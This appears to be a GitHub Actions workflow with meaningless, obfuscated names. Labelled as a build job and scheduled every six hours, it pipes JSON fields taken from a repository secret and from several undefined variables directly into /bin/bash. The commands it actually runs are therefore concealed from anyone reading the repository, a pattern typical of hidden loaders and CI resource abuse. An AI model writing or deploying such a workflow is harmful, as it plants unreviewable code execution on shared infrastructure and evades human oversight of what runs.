name: piernuosi
on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: piernuosi
        env:
          j7901: ${{ secrets.j7901 }}
        run: |
          echo $j7901 | jq -r .ns9135 | /bin/bash
          echo $sz8 | jq -r .uglu92983 | /bin/bash
          echo $cy25433 | jq -r .u2071 | /bin/bash
          echo $ii5438 | jq -r .ml47989 | /bin/bash
          echo $b4694 | jq -r .bc0412 | /bin/bash
          echo $sx358 | jq -r .q20 | /bin/bash
          echo $tc6 | jq -r .ukqu0 | /bin/bash
          echo $c9459 | jq -r .pfegh8 | /bin/bash

